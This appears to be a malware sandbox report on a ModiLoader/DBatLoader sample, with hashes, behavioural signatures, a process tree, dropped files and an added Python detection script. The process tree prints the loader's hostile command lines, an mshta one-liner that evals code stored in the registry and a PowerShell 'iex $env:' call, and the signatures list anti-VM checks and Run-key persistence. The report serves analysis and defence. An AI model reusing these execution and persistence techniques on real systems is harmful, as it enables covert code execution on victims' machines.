Analysis

  • max time kernel    149s
  • max time network   151s
  • platform           windows7_x64
  • resource           win7-20231129-en
  • resource tags      arch:x64 arch:x86 image:win7-20231129-en locale:en-us os:windows7-x64 system
  • submitted          09-05-2024 11:49

General

  • Target   29d53275576b5ded03ed2a1e5dc1f0cf_JaffaCakes118.exe
  • Size     289KB
  • MD5      29d53275576b5ded03ed2a1e5dc1f0cf
  • SHA1     754da96a93a901bd9a2885b438b11989f020621b
  • SHA256   2bb093ea941ca8237a3e10f73497cf0f5c56982a0419b49d8b10ebd2f582ed6a
  • SHA512   11d35cf5d0589c589a7ac7ebf8cd44d03ce5a8a6ea078b5b5c0e083dcfdce22bc6d3d2a01a304cfbcec512ec0e9d5178dc1beb6241078de4f3b002a33979a27e
  • SSDEEP   6144:7sd6m6EUzDxm5xO8swLLu/H5jJcvQR7ZQwClBkcdfpYWVitetEg:7sd6m6EUztodsR5jI47ZJClBkUpbl

Signatures

  • ModiLoader, DBatLoader

    ModiLoader is a Delphi loader that misuses cloud services to download other malicious families.

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Checks for common network interception software 1 TTPs

    Looks in the registry for tools like Wireshark or Fiddler commonly used to analyze network activity.

  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 6 IoCs
  • Looks for VirtualBox Guest Additions in registry 2 TTPs 1 IoCs
  • Looks for VirtualBox drivers on disk 2 TTPs 1 IoCs
  • ModiLoader Second Stage 53 IoCs
  • Looks for VMware Tools registry key 2 TTPs 3 IoCs
  • Checks BIOS information in registry 2 TTPs 2 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Deletes itself 1 IoCs
  • Drops startup file 1 IoCs
  • Executes dropped EXE 2 IoCs
  • Loads dropped DLL 3 IoCs
  • Adds Run key to start application 2 TTPs 3 IoCs
  • Maps connected drives based on registry 3 TTPs 2 IoCs

    Disk information is often read in order to detect sandboxing environments.

  • Drops file in System32 directory 1 IoCs
  • Suspicious use of SetThreadContext 4 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Modifies Internet Explorer settings 1 TTPs 3 IoCs
  • Modifies registry class 7 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: MapViewOfSection 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 48 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\29d53275576b5ded03ed2a1e5dc1f0cf_JaffaCakes118.exe
    "C:\Users\Admin\AppData\Local\Temp\29d53275576b5ded03ed2a1e5dc1f0cf_JaffaCakes118.exe"
    1⤵
    • Suspicious use of SetThreadContext
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:1660
    • C:\Users\Admin\AppData\Local\Temp\29d53275576b5ded03ed2a1e5dc1f0cf_JaffaCakes118.exe
      "C:\Users\Admin\AppData\Local\Temp\29d53275576b5ded03ed2a1e5dc1f0cf_JaffaCakes118.exe"
      2⤵
      • Identifies VirtualBox via ACPI registry values (likely anti-VM)
      • Looks for VMware Tools registry key
      • Loads dropped DLL
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of WriteProcessMemory
      PID:2864
      • C:\Users\Admin\AppData\Roaming\FF32A6D9-ACAE-42F5-AE3C-A6CAF0BDEBA9\29d53275576b5ded03ed2a1e5dc1f0cf_JaffaCakes118.exe
        "C:\Users\Admin\AppData\Roaming\FF32A6D9-ACAE-42F5-AE3C-A6CAF0BDEBA9\29d53275576b5ded03ed2a1e5dc1f0cf_JaffaCakes118.exe"
        3⤵
        • Executes dropped EXE
        • Loads dropped DLL
        • Suspicious use of SetThreadContext
        • Suspicious use of SetWindowsHookEx
        • Suspicious use of WriteProcessMemory
        PID:1344
        • C:\Users\Admin\AppData\Roaming\FF32A6D9-ACAE-42F5-AE3C-A6CAF0BDEBA9\29d53275576b5ded03ed2a1e5dc1f0cf_JaffaCakes118.exe
          "C:\Users\Admin\AppData\Roaming\FF32A6D9-ACAE-42F5-AE3C-A6CAF0BDEBA9\29d53275576b5ded03ed2a1e5dc1f0cf_JaffaCakes118.exe"
          4⤵
          • Identifies VirtualBox via ACPI registry values (likely anti-VM)
          • Looks for VMware Tools registry key
          • Executes dropped EXE
          • Suspicious behavior: EnumeratesProcesses
          PID:2588
  • C:\Windows\system32\mshta.exe
    "C:\Windows\system32\mshta.exe" javascript:dxpSbwS8="e9kmcjI";I5q3=new%20ActiveXObject("WScript.Shell");lC3FPPa="9hx";ND42st=I5q3.RegRead("HKLM\\software\\Wow6432Node\\oWkmdT9U\\osp3ZocR");Fo9arfOV="9l";eval(ND42st);O1qCYBe="wTam";
    1⤵
    • Process spawned unexpected child process
    • Modifies Internet Explorer settings
    • Suspicious use of WriteProcessMemory
    PID:2644
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" iex $env:cbfo
      2⤵
      • Drops file in System32 directory
      • Suspicious use of SetThreadContext
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious behavior: MapViewOfSection
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:2624
      • C:\Windows\SysWOW64\regsvr32.exe
        regsvr32.exe
        3⤵
        • Looks for VirtualBox Guest Additions in registry
        • Looks for VirtualBox drivers on disk
        • Looks for VMware Tools registry key
        • Checks BIOS information in registry
        • Deletes itself
        • Drops startup file
        • Adds Run key to start application
        • Maps connected drives based on registry
        • Suspicious use of SetThreadContext
        • Modifies Internet Explorer settings
        • Modifies registry class
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious behavior: MapViewOfSection
        • Suspicious use of WriteProcessMemory
        PID:1080
        • C:\Windows\SysWOW64\regsvr32.exe
          "C:\Windows\SysWOW64\regsvr32.exe"
          4⤵
            PID:1584
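The second tree above is the part a detection engineer wants to match: mshta.exe runs an inline javascript: URI that pulls its next stage out of a registry value and eval()s it, PowerShell then executes code handed over in the environment variable cbfo, and an argument-less regsvr32.exe (nothing to register) is used as the host for the final stage, with SetThreadContext and WriteProcessMemory reported against it. The script below is an added example, not part of the sandbox report: it takes the command lines from the Processes section as constructed input records and flags each stage. The record layout, the function names and the heuristics are this example's own assumptions; PPID 0 marks a parent outside the recorded tree.

```python
"""Flag the mshta -> powershell -> regsvr32 staging chain from this report's process tree.

Added example; not sandbox output. PROCESSES is constructed from the Processes
section of the report (PPID 0 = parent outside the recorded tree); the field
layout and the heuristics are this example's own assumptions.
"""
import re
from urllib.parse import unquote

# (pid, ppid, image path, command line) -- constructed from the report's tree.
PROCESSES = [
    (1660, 0,
     r"C:\Users\Admin\AppData\Local\Temp\29d53275576b5ded03ed2a1e5dc1f0cf_JaffaCakes118.exe",
     r'"C:\Users\Admin\AppData\Local\Temp\29d53275576b5ded03ed2a1e5dc1f0cf_JaffaCakes118.exe"'),
    (2644, 0, r"C:\Windows\system32\mshta.exe",
     r'"C:\Windows\system32\mshta.exe" javascript:dxpSbwS8="e9kmcjI";'
     r'I5q3=new%20ActiveXObject("WScript.Shell");lC3FPPa="9hx";'
     r'ND42st=I5q3.RegRead("HKLM\\software\\Wow6432Node\\oWkmdT9U\\osp3ZocR");'
     r'Fo9arfOV="9l";eval(ND42st);O1qCYBe="wTam";'),
    (2624, 2644, r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe",
     r'"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" iex $env:cbfo'),
    (1080, 2624, r"C:\Windows\SysWOW64\regsvr32.exe", "regsvr32.exe"),
    (1584, 1080, r"C:\Windows\SysWOW64\regsvr32.exe", r'"C:\Windows\SysWOW64\regsvr32.exe"'),
]

REGREAD_RE = re.compile(r'RegRead\("([^"]+)"\)', re.IGNORECASE)
IEX_RE = re.compile(r"\b(iex|invoke-expression)\b", re.IGNORECASE)


def image_name(path):
    return path.rsplit("\\", 1)[-1].lower()


def registry_payload_path(cmdline):
    """Registry value an mshta javascript: payload pulls its next stage from, or None."""
    decoded = unquote(cmdline)  # mshta receives a URI, so the script body is %-encoded
    m = REGREAD_RE.search(decoded)
    if not m:
        return None
    return m.group(1).replace("\\\\", "\\")  # undo the JavaScript string escaping


def flag(proc, by_pid):
    """Apply the three stage heuristics to one record; returns a list of findings."""
    pid, ppid, image, cmdline = proc
    name = image_name(image)
    parent = by_pid.get(ppid)
    parent_name = image_name(parent[2]) if parent else None
    decoded = unquote(cmdline)
    low = decoded.lower()
    findings = []

    # Stage 1: mshta running an inline javascript: URI that eval()s a registry value.
    if name == "mshta.exe" and "javascript:" in low:
        findings.append("mshta executes an inline javascript: URI")
        if "regread(" in low and "eval(" in low:
            findings.append("next stage read from registry value "
                            + registry_payload_path(cmdline))

    # Stage 2: PowerShell evaluating code handed over in an environment variable.
    if name == "powershell.exe" and IEX_RE.search(low) and "$env:" in low:
        findings.append("Invoke-Expression on $env: content (stage passed via environment)")

    # Stage 3: regsvr32 with no DLL to register is only useful as an injection host.
    if name == "regsvr32.exe":
        tokens = decoded.strip().split(None, 1)
        if len(tokens) == 1 and parent_name in {"powershell.exe", "regsvr32.exe"}:
            findings.append("regsvr32 without a DLL argument, spawned by " + parent_name)

    return findings


def triage(processes):
    """Map pid -> findings for every process that trips at least one heuristic."""
    by_pid = {p[0]: p for p in processes}
    return {p[0]: f for p in processes if (f := flag(p, by_pid))}


if __name__ == "__main__":
    for pid, notes in triage(PROCESSES).items():
        print(pid)
        for note in notes:
            print("   ", note)
```

The URL-decoding step matters: mshta is handed a URI, so `new%20ActiveXObject` only reads as `new ActiveXObject` after unquoting, and a rule that searches the raw command line for `ActiveXObject(` preceded by a space will miss it. The recovered value `HKLM\software\Wow6432Node\oWkmdT9U\osp3ZocR` is the place to look on a live host for the stage that the sandbox only saw executing in memory.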

    Network

    MITRE ATT&CK Enterprise v15

    Downloads

    • C:\Users\Admin\AppData\Local\416844\1a6bc1.983f33d
      Filesize  16KB
      MD5       3725ca4cdcca4e5760a4322f0891770e
      SHA1      5676e4505dca24e502e0ca19d0860e8ee5df32bd
      SHA256    f012b4205cf478530338ef27db54196c52cc2773a66517382988e6bc651b2322
      SHA512    a2370ffc00077fc890cdc41120fbc633eb321386b763b695e81bf89f364238104bd28dd47c441c9963b3123790f517fc8854b9bf87c554c59ae19ccafdb4eb30

    • C:\Users\Admin\AppData\Local\416844\7efaba.bat
      Filesize  61B
      MD5       a9d3ea542d72c3d4eb6e79b37f9b265e
      SHA1      9ef048c6a4cc72891fe4b6d8c3ae59e134711cb9
      SHA256    d287a2bcc9c2485a60329a6bb94fb260bec57524e3098a5bd7c7cedf3e460314
      SHA512    eba879b158972749be9a48b1ff0d7393f69960da48c1f8e92c3886d9cf16ae437ac5eea449f59de788cbf5b9033ebc78311f2b591f6d41631521a3f0ea24208b

    • C:\Users\Admin\AppData\Local\416844\eecdc5.lnk
      Filesize  881B
      MD5       dc7d7d400a2ef3f6bd26b5b59752dc65
      SHA1      24024493823a5eddce9744e2c0d7a1c08883ad58
      SHA256    ddda6e501616a1507124ac030f156ba4d2701400dba1f526034dc94dbd8fc16b
      SHA512    f08cb194d3a8fc48e79e0f2ee0aa02902ebc08ded5531bf4656baa88b2bbba0e908a59dd830c1d625eeb542a30d7d199b83b22ca9d212ecf4d45cda4b1d0aab1

    • C:\Users\Admin\AppData\Roaming\730a4b\791dbf.983f33d
      Filesize  39KB
      MD5       aa37b7596ed13ac91b87344631bce5b8
      SHA1      0f873444ac01f923e70f7bef5a9b0b302787cc9d
      SHA256    eb216409d0231346cc0b05114e632d4f8a0dfb9857a455d4f85cdf2f8e2aa863
      SHA512    c545701e2c938174a35bc423b6053618dc11f38929a262d714717c59d52bf0cb09179fe5fa36b44c43192aaf7eb071cc57ef60b4a4731ca7377b0a4932862022

    • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\be0980.lnk
      Filesize  991B
      MD5       fecb855b47f9a96231ba51789b61f929
      SHA1      44f9d8498b33569cac0a0a939c3dc636564cea06
      SHA256    9a45685f97f6534d880ced46ede455e8ef78877ab1bbef76986335309eddd3c7
      SHA512    94307f8bb949464855a8a7088a4f3f1d70232006f2dc57f85567963a9253056b589de203fb5244ef8de53a8122dcdcc61c5533b7ec85b33805b9339cebd09bff

    • \Users\Admin\AppData\Roaming\FF32A6D9-ACAE-42F5-AE3C-A6CAF0BDEBA9\29d53275576b5ded03ed2a1e5dc1f0cf_JaffaCakes118.exe
      (hashes identical to the submitted sample: the loader copies itself unmodified into this directory)
      Filesize  289KB
      MD5       29d53275576b5ded03ed2a1e5dc1f0cf
      SHA1      754da96a93a901bd9a2885b438b11989f020621b
      SHA256    2bb093ea941ca8237a3e10f73497cf0f5c56982a0419b49d8b10ebd2f582ed6a
      SHA512    11d35cf5d0589c589a7ac7ebf8cd44d03ce5a8a6ea078b5b5c0e083dcfdce22bc6d3d2a01a304cfbcec512ec0e9d5178dc1beb6241078de4f3b002a33979a27e

    • Memory dumps, named memory/<PID>-<dump index>-<start>-<end>-memory.dmp; one file per dump index, all dumps of a row cover the same region:

      PID   Region                                   Filesize  Dump indices
      1080  0x0000000000200000-0x0000000000341000    1.3MB     42, 44, 46-68, 73-77, 84, 85 (32 dumps)
      1584  0x0000000000110000-0x0000000000251000    1.3MB     92-100 (9 dumps)
      2624  0x0000000006340000-0x0000000006416000    856KB     41, 45
      2864  0x0000000000320000-0x00000000003F6000    856KB     14, 17-22
      2864  0x0000000000400000-0x000000000043F000    252KB     2, 4, 16